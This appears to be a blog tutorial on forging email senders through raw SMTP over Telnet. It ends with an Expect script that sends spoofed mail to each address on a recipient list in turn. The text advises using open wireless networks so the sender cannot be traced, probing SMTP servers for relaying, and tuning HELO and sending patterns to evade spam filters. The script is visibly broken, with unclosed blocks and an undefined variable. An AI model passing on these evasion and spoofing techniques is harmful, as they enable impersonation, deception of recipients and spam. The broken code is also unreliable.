Send forged mails with telnet


Thanks to an odd gift of the history of internet, the SMTP protocol (the one used for sending mails) in most cases doesn’t require authentication. This means that if you want to send a mail pretending to be , you have just to declare that the sender is Really that is all! An extremely easy-to-use program for using SMTP is Telnet: you can send a fake mail in 10 seconds typing few words! We include a short tutorial here in this text, you can find more extended ones on the net.
But remember: forging mail is not anonymous! The mails you send will show your IP address… so choose a good open wireless that cannot be associated with you.

Finding a proper SMTP server for your action

Not all the SMTP servers are appropriate. Every ISP (internet service provider) configures its SMTP server differently and it can be tricky to find out the specific policy of each one. Most policies are there to restrict the amount of spam. So, for example, most SMTP servers will limit the number of recipients, the number of connections over a period of time, etc. The network you are using could even be blacklisted by the SMTP server if it has been used by spammers before. It is a good idea to test this thoroughly beforehand, and to check several connections from different ISPs. You should test your server to check if it is a relay and lets you send your mail to the desired number of recipients, and if the message is properly delivered.
But be aware to not abuse the SMTP server for testing it: it you are sending too much spam-like communication over the server, they may be thinking spammer are using their server and adopt more restrictive anti-spam policies…
Learn from spammers!

Making a small script

If your mail has to reach a large press list, better using a short script for automating the use of Telnet.
Expect (Tcl) is an example of a good language, available for Linux, Mac, Windows (but if you really want to be safe and anonymous, better switch to Linux). You can find an example of a script at the end of the text.

Understand how antispam works

One of the biggest risks is that your fake mail ends up in the junk mail folder, or does not even arrive.
This can be caused by several factors.

If you send your mail to small number of recipients.
If your mail reaches the spam folder this means probably that the data field (the code of the mail) is improperly formatted, or that you have badly set the HELO. Double check the code.

If you send your mail to large number of recipients
Many commercial e-mail providers have strict criteria which can flag your message as spam if sent to large number of recipients in a short time. That is especially relevant for commercial domains (like Yahoo, Gmail or Hotmail), not much for institutional or corporate domains, which have looser antispam filters. If most of your recipients have corporate addresses (as it is normally the case for journalist), be relaxed: this risk don’t really concern you.

You can usually find on the net the antispam policy of every single provider.

Some good recommendations for reducing the risk of being blocked by anti-spam filters are:
– not to use a SMTP servers / IP address which is blacklisted for spam reason
– send each mail one by one / and include the recipient line in the data field (avoid sending by chunks)
– try to avoid receiving error messages from your SMTP server, for example by making too many connections at the same
-choose a good HELO, usually the best solution is to choose the same name of the SMTP server of the ISP you are connected to.

Example of an expect script (awful but functioning)

The script will open a Telnet session connecting to the SMTP server, and once that is established it will start sending sequential mails
(it sends a single mail to every recipient: that is the best option not to be annoyed by anti spam)

#!/usr/bin/expect -f

#The first argument is a text file with all the recipient e-mail addresses
#The second argument is the SMTP server to which you want to connect, usually the local ISP provider of the network you are using
#The third one is the HELO you give to the server. The more anti-spam friendly solution is to put the very same name of the SMTP server
#The forth one is the sender e-mail
#The fifth one is the first part of the data field, till the “To:” field (this can be empty if the data field start with the recipient mail)
#The sixth one is the second part of the data field, after the “To:” field

set timeout 20
set server [lindex $argv 1]
set myhelo [lindex $argv 2]
set sender [lindex $argv 3]
set recipients [lindex $argv 0]
set data_file1 [lindex $argv 4]
set data_file2 [lindex $argv 5]
set rcpt_id [open $recipients r]
set data1_id [open $data_file r]
set data2_id [open $data_file1 r]
set data1 [read $data1_id]
set data2 [read $data2_id]
spawn Telnet $server 25
expect {
“220” {puts “ok”}
timeout { send “QUIT\n” ; puts “SMTP server not answering”; exit}
send “HELO $myhelo\n”
expect {
“250” {puts “ok”}
timeout { send “QUIT\n” ; puts “Not answering to HELO” ; exit}
set line [gets $rcpt_id]
while { $line >= 0 } {
send “MAIL from: $sender\n”
expect {
“250” {puts “ok”}
timeout { send “QUIT\n” ; puts “Connection lost: connectivity problem or SMTP server? Last recipient:”, puts $line; exit}
send “RCPT to: $line\n”
expect {
“250” {puts “ok”}
timeout { send “QUIT\n” ; puts “Connection lost: connectivity problem or SMTP server? Last recipient:”,puts $line; exit}
send “DATA\n”
expect {
“354” {puts “ok”}
timeout { send “QUIT\n” ; puts “Connection lost: connectivity problem or SMTP server? Last recipient:”, puts $line; exit}
send $data1
send “To: \n”
send $data2
send “\n.\n”
expect {
“250” {puts “E-mail successfully delivered”}
timeout { send “QUIT\n” ; puts “Connection lost: connectivity problem or SMTP server? Last recipient:”, puts $line; exit}
puts $line
set line [gets $rcpt_id]
send “QUIT\n”
expect “221”

Leave a Reply

Your email address will not be published.